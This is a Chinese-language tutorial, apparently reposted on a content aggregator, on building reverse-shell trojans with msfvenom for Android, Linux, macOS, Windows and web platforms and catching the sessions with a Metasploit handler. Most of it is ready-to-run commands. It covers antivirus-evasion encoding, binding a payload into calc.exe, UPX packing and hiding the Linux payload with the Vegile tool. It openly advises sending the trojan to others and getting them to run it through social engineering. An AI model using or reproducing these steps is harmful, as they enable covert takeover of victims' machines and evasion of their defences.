目錄

Msfvenom

生成exe木馬

生成Linux木馬

方法一：

方法二：

---

在前一篇文章中我講了什么是Meterpreter，并且講解了Meterpreter的用法。傳送門——>Metasploit之Meterpreter

今天我要講的是我們用Msfvenom制作一個木馬，發送給其他主機，只要其他主機運行了該木馬，就會自動連接到我們的主機，并且建立一條TCP連接。我們可以通過這條TCP連接控制目標主機。

Msfvenom

• –p (- -payload-options)：添加載荷payload。載荷這個東西比較多，這個軟件就是根據對應的載荷payload生成對應平臺下的后門，所以只有選對payload，再填寫正確自己的IP，PORT，就可以生成對應語言，對應平臺的后門了！！！
• –l：查看所有payload encoder nops。
• –f ：輸出文件格式。
• –e：編碼免殺。
• –a：選擇架構平臺? x86 | x64 | x86_64
• –o：文件輸出
• –s：生成payload的最大長度，就是文件大小。
• –b：避免使用的字符 例如：不使用 ‘\0f’。
• –i：編碼次數。
• –c：添加自己的shellcode
• –x | -k：捆綁

安卓app:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -o ~/Desktop/test2.apk

Linux:

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f elf > shell.elf

Mac:

msfvenom -p osx/x86/shell_reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f macho > shell.macho

PHP：

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.20.27 LPORT=4444 -f raw -o test.php

ASP:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f asp > shell.asp

ASPX：

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f aspx > shell.aspx

JSP:

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.10.27 LPORT=8888 -f raw > shell.jsp

Bash：

msfvenom -p cmd/unix/reverse_bash LHOST=192.168.10.27 LPORT=8888 -f raw > shell.sh

Perl

msfvenom -p cmd/unix/reverse_perl LHOST=192.168.10.27 LPORT=8888 -f raw > shell.pl

Python

msfvenom -p python/meterpreter/reverser_tcp LHOST=192.168.10.27 LPORT=8888 -f raw > shell.py

生成exe木馬

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.27 lport=8888 -f exe -o test.exe #lhost是我們的主機ip，lport是我們主機的用于監聽的端口

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.10.27 lport=8888 -i 3 -e x86/shikata_ga_nai -f exe -o test.exe #編碼3次

然后會在該目錄下生成一個test.exe的木馬。

msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp -e x86/shikata_ga_nai -i 20 lhost=192.168.10.11 lport=8888 -x calc.exe -f exe -o test.exe #編碼20次、捆綁正常的32位calc.exe，生成32位的test.exe文件

利用 upx 加殼

upx -9 test.exe -k -o test2.exe

接下來，我們運行?msfconsole?進入MSF控制臺，然后輸入以下命令

msf > use exploit/multi/handler #使用exploit/multi/handler監聽從肉雞發來的數據

msf exploit(handler) > set payload windows/meterpreter/reverse_tcp #設置payload，不同的木馬設置不同的payload

msf exploit(handler) > set lhost 192.168.10.15 #我們的主機ip

msf exploit(handler) > set lport 8888 #我們的主機端口

msf exploit(handler) > exploit

然后，將木馬發送給其他人，無論使用什么手段(可以使用社會工程學)讓其在其他主機上運行，我們這邊就會接收到反彈過來的session。

因為我們剛剛把進程掛在后臺，所以我們輸入：sessions? -l? 可以查看到我們得到的shell，使用 sessions -i? 1?可以進入指定的shell，我們這里只有一個，所以id為1。如圖，我們成功拿到了其他主機的shell

生成Linux木馬

方法一：

執行以下命令會生成一個elf文件

#生成32位的馬

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=VPS的地址 LPORT=8888 -f elf > test.elf

#生成64位的馬

msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=VPS的地址 LPORT=8888 -f elf > test.elf

然后MSF開啟監聽

use exploit/multi/handler

set payload linux/x64/meterpreter/reverse_tcp

set LHOST 0.0.0.0

set LPORT 8888

exploit -j

?

將該elf文件上傳到目標機器，添加可執行權限，然后執行即可

方法二：

首先，在我們的Kali上生成一個Linux類型的木馬test

msfvenom -a x86 --platform linux -p linux/x86/shell/reverse_tcp LHOST=VPS的地址 LPORT=8888 -b "\x00" -f elf -o test

在目標機器上下載Vegile，命令如下，然后將?test 傳到Vegile目錄下

git clone https://github.com/Screetsec/Vegile.git

cd Vegile

chmod +x Vegile

?

在Kali上開啟監聽如下

use exploit/multi/hander

set payload linux/x86/shell/reverse_tcp

set lhost 192.168.10.13

set lport 8888

exploit -j

然后在目標及執行如下

./Vegile --u test

或

./Vegile --i test

然后我們的VPS就可以收到目標機器彈回來的shell了。

關于后滲透階段如何使用Meterpreter，傳送門——>后滲透階段Meterpreter的使用

總結

以上是生活随笔為你收集整理的Msfvenonm生成后门的全部內容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯，歡迎將生活随笔推薦給好友。